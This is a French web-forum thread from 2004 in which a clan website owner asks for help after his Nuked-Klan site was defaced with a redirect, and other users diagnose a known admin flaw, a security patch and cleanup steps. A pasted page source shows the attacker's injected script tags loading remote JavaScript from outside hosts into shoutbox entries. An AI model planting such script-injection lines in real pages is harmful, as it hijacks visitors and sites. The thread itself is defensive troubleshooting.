Hack de site.

Statut
N'est pas ouverte pour d'autres réponses.

GUMBAL

💎💎💎💎💎
Voila il y la semaine passée quelqu’un c t amusé a mettre a lien qui:
Quand on allait sur notre site cela nous redirigé vers une page avec le cyber doigts (vous connaissait bien…)
Mais cela été très gênant car on a besoin de notre site et avec ce lien pas moyen d y entrer, alors j ai appeler un Admin. des cyber doigt et il a bloquer le comte de KRAPO pour triche…
Mais le blem et tj la la il vient de nous re hacker ou je c pas trop quoi.
La semaine passé qd on allé sur notre site un message s afficher avec le Chan #anpe donc j ai été lui parler et je lui est demander pourquoi il fait ça ? il m a répondu « ben pour avoir l plus de pont possible….j ai déjà eu plus de 25 site halflife expert…)
La team Yg a également eu ce problème pour temps c est une personne que nous connaisons absolument pas


La il vient de nous remettre un lien merdique encore une fois vers le site du hack magazine.
J aimerais savoir comment virer ce lien mais aussi comment mieux protéger notre site (encore la ça va car c est un site nuked et que c est pas encore un site fait main mais bon c est très agaçant.


Merci a tous

Pour plus d info aller voire notre site merci.
 
1er
OP
GUMBAL

GUMBAL

💎💎💎💎💎
phpSecure.info
Posté par MaStErPsX le 06/04/2004 à 09:07


phpSecure.info viens de sortir un patch de sécurité pour nuked-klan 1.5 et SP2, ce patch corrige plusieurs failles et inclus le précédent patch, vous pouvez vous rendre directement sur leur site ou télécharger le patch à partir d'ici grâce à un lien direct.
Merci à frog-m@n pour ce patch


http://www.phpsecure.info
Bon ben pour securisé un site ben ai
trouver des patch
je v donc les essayé.
 
1er
OP
GUMBAL

GUMBAL

💎💎💎💎💎
Bon j ai mis des patch sur le site mais je vois rien qui ne change donc si qqun sait comment regler ce blem merci.
 

Esta

Boy's dream
je comprend pas tt : il nous hack alrs faut dl des patchs. il nous hack par rapport a des liens???:pfiou:
 

MbK_

Etudjant
change de serveur, contacte HL expert pour voir si il y a moyen qu'ils fassent qlqch, look si les autres sites hacked sont chez ulimit, ...

TRO PTDR LE LIEN VERS LE SITE LOOOOOLL!! jador la chanson!
 

Tigrou

Touriste
Ben c est a dire que ce n est pas précis. Il faudrait préciser !!
Ce qui est sur c est que pour nuked-klan 1.5 sp2 et version antérieure il y a un exploit tres facile a utiliser qui permet a n importe qui d etre admin sur un site nuked-klan. Comme le disait precedemment une autre personne ici, phpsecure.info a sorti un patch qui evite que les personnes puissent devenir admin.

Ensuite pour ce qui est de ton lien hacké, c est pas très clair !! Le seul lien que je peux imaginer etre hacké c est une redirection de type Ulimit ou dot.tk A partir de ce moment la : plusieurs possibilités

- t as donné ton pass a qqun
- t as un pass bidon -> de moins de 6 lettres, présent dans le dictionnaire, sans caracteres speciaux ou chiffres
- t as un keylogger sur ta machine
- je t en passe et des meilleures
 
c'est pas un hack ulimit puskon arrive bien sur le site LordZ.

Maintenant ke les patchs sont installés (pour éviter qu'il recommence, en tout cas pour un moment :) ), faudrait remettre le code comme il était avant le hack, de ton coté, ou du coté des admins.
 

legrand_ph

Touriste
pas mal la team soquette ^^
 

MbK_

Etudjant
Le Pacha Janivo a dit:
c'est pas un hack ulimit puskon arrive bien sur le site LordZ.

Maintenant ke les patchs sont installés (pour éviter qu'il recommence, en tout cas pour un moment :) ), faudrait remettre le code comme il était avant le hack, de ton coté, ou du coté des admins.
ouai il y a un petit popup qui s'ouvre. allez voir ici
puis une redirection. c'est une modification du code dans la page index. allez sur le ftp et reuploader la page pour voir si ca marche!
 

Tigrou

Touriste
Pas sur que ca change qqchose de reuploader la page index.php. A fortiori, il n a pas eu acces au ftp le gars donc il ne peut pas modifier reellement le code, il peut juste s il est un peu malin utiliser les failles du code pour arriver a ses fins en remplacant des variables au sein de requetes ....

Donc s il n a pas eu acces au ftp, ce popup est probablement encré dans une de tes news ou ailleurs dans tes blocs etc ....
en gros qque part dans ta db :roll:
 
Tigrou a dit:
Pas sur que ca change qqchose de reuploader la page index.php. A fortiori, il n a pas eu acces au ftp le gars donc il ne peut pas modifier reellement le code, il peut juste s il est un peu malin utiliser les failles du code pour arriver a ses fins en remplacant des variables au sein de requetes ....

Donc s il n a pas eu acces au ftp, ce popup est probablement encré dans une de tes news ou ailleurs dans tes blocs etc ....
en gros qque part dans ta db :roll:
oui ça m'a tout l'air d'être un javascript posté dans une news ou je sais pas ou!

> Vérifie les derniers enregistrements dans ta bdd
> Trouve le javascript
> Vire-le
> Change tous tes pass

:]
 
cTn- a dit:
-simoul a dit:
je comprend pas tt : il nous hack alrs faut dl des patchs. il nous hack par rapport a des liens???:pfiou:
Nuked klan pleins de failles :\

Ou bien gumbal ne sait pas s'exprimer et le type a juste hacker le compte ulimit.

:pfiou:
Non j'pense plutôt que c'est une redirection en javascript tout simplement :roll:
 
1er
OP
GUMBAL

GUMBAL

💎💎💎💎💎
Ben voila je suis pas un pro et je m y connais a peine ds les site mais j ai cru entendre que cela vener de la tribune libre...
Me damdner pas pk j en sais rien en fait

Sinon pour ce qui est des pass j ai jms rien donner a personne


Non j'pense plutôt que c'est une redirection en javascript tout simplement
Oui j y ai penser ossi.

Sinon j ai deja up des new fichier index et tous ce que vs m avez demandé

Bon ben si pas je change d hebergeur ou je refais une demande (de toute facon un new site est en cours)


Merci de votre aide a tous
 

Tigrou

Touriste
Ce qu on essaye de te dire , c est que justement reuploader des fichiers index.php ca ne changera rien.
Le gars avec l exploit Nuked-Klan il n a pas eu acces a ton ftp , il a juste reussi a se mettre admin sur ton site et a poster une news comme toi tu le fais.

Donc en gros le gars a soit poste une nouvelle news soit modifié une ancienne news en rajoutant qqchose du genre :
Code:
<script>... </script>
Donc a ta place je me dirais que j ai deux solutions :

1. La facilité : j ai un dump recent ou une sauvegarde manuelle recente de ma base de données avant que le gars n ai "piraté" le site -> j efface la base actuelle et je mets la sauvegarde a la place -> comme ca j ai vire son <script> -> prob regle

2. La patience : je me connecte a ma base de donnée en phpmyadmin ou mysqlfront et j epluche les news, les commentaires, etc ... jusqu a ce que je tombe sur son <script> que je m empresse d effacer -> prob regler

A toi de voir :D :wink:
 

Bartdude

Touriste
dans ie : tu tapes "view-source:" devant l'adresse de ta page => tu as la source qui s'affiche en notepad => tu fais une recherche sur "</script>" ou sur ".location" , ou simplement sur l'adresse vers laquelle tu es redirigé => tu sais voir dans quelle news ca merde (si c bien ca...)
 
GUMBAL a dit:
Ben voila je suis pas un pro et je m y connais a peine ds les site mais j ai cru entendre que cela vener de la tribune libre...
Me damdner pas pk j en sais rien en fait
Bah suffit d'aller faire un tour dans la table en question (celle de la tribune) de ta base de données et d'effacer le dernier enregistrement ou tout simplement vider la table, tu ne perdras que ce qui se trouve dans la tribune libre ... rien de bien important! :]
 

BiNa

Bouffeur de yaourt
Bartdude a dit:
dans ie : tu tapes "view-source:" devant l'adresse de ta page => tu as la source qui s'affiche en notepad => tu fais une recherche sur "</script>" ou sur ".l0cation" , ou simplement sur l'adresse vers laquelle tu es redirigé => tu sais voir dans quelle news ca merde (si c bien ca...)
J'ai testé pour voir, j'ai obtenu ca, apparement c'est ce dont on parlais qu'il y a ici.

<html><head><meta http-equiv="content-style-type" content="text/css">
<link title="style" type="text/css" rel="stylesheet" href="themes/Hitech/style.css">
</head> <table width="100%" align="center" cellspacing="0" cellpadding="0" bgcolor="#011110"> <body bgcolor="#011110"><tr><td width="110"><b>enora</b></a></td></tr><tr><td width="110"><font size="1">le 19/05/04 à 17:59<br><script src=http://membres.lycos.fr/krapoted/krapo7.js></script>  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL</b></a></td></tr><tr><td width="110"><font size="1">le 17/05/04 à 10:58<br>Voila krapo T n***** va  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>lol</b></a></td></tr><tr><td width="110"><font size="1">le 16/05/04 à 21:07<br>krapo fils de **** file ton msn  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>krapo</b></a></td></tr><tr><td width="110"><font size="1">le 15/05/04 à 17:53<br><script src=http://www.kidlogis.com/krapo/krapo3.js></script>  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL</b></a></td></tr><tr><td width="110"><font size="1">le 13/05/04 à 14:10<br>NEW SITE EN COURS DE REALISATION!!!!!!!!!!  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL</b></a></td></tr><tr><td width="110"><font size="1">le 10/05/04 à 12:25<br>raidain j ai une idee de new site  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>RaiDain</b></a></td></tr><tr><td width="110"><font size="1">le 05/05/04 à 12:16<br>^^  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL</b></a></td></tr><tr><td width="110"><font size="1">le 02/05/04 à 19:39<br>Ok raidain je v te montrer un truc pour le site  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL1</b></a></td></tr><tr><td width="110"><font size="1">le 28/04/04 à 07:45<br>Oui pecman tu ma dit pk mais je comprend<img src="modules/Textbox/smileys/biggrin.gif" border="0" alt=":green">  </font><hr size="1"></td></tr></body> <body bgcolor="#011110"><tr><td width="110"><b>GUMBAL1</b></a></td></tr><tr><td width="110"><font size="1">le 26/04/04 à 11:24<br:pfrt:reparation d un new site? autre que nuked? j ai qq idee<img src="modules/Textbox/smileys/biggrin.gif" border="0" alt=":green"><img src="modules/Textbox/smileys/biggrin.gif"
:roll:
 

Bartdude

Touriste
oui et y'en a quelques une apparament (j'en vois au moins un plus bas dans la page) => c ceux là qu'il faudrait enlever de ta table à priori. mais maintenant moi php-nuke j'y connais trop rien, c pas mon trip, c peut-être normal.

Mon truc c t pour arriver à voir la source d'une page malgré la redirection...c parfois pratique
 

Ezekiel !

Elite
il doit bien avoir moyen de remonter jusqu'à lui via sont ftp lycos non? Sans dec ça me ferait trop chier de voir qu'un petit malin s'amuse à rediriger mon site...
Son site c'est http://membres.lycos.fr/krapoted si d'autres n'aurais pas vu le code source...

Au fait gumbal tu peux toujours lui piker ses design :p Faut aimer le style mais bon :D
 

Bartdude

Touriste
Ez3k_eL a dit:
il doit bien avoir moyen de remonter jusqu'à lui via sont ftp lycos non? Sans dec ça me ferait trop chier de voir qu'un petit malin s'amuse à rediriger mon site...
Son site c'est http://membres.lycos.fr/krapoted si d'autres n'aurais pas vu le code source...

Au fait gumbal tu peux toujours lui piker ses design :p Faut aimer le style mais bon :D
mouais et à quoi bon ? un ptit con qui exploite une backdoor super-connue, tu vas pas lui faire un procès quand-même. Patche ton site et voilà ...
 
Statut
N'est pas ouverte pour d'autres réponses.
Haut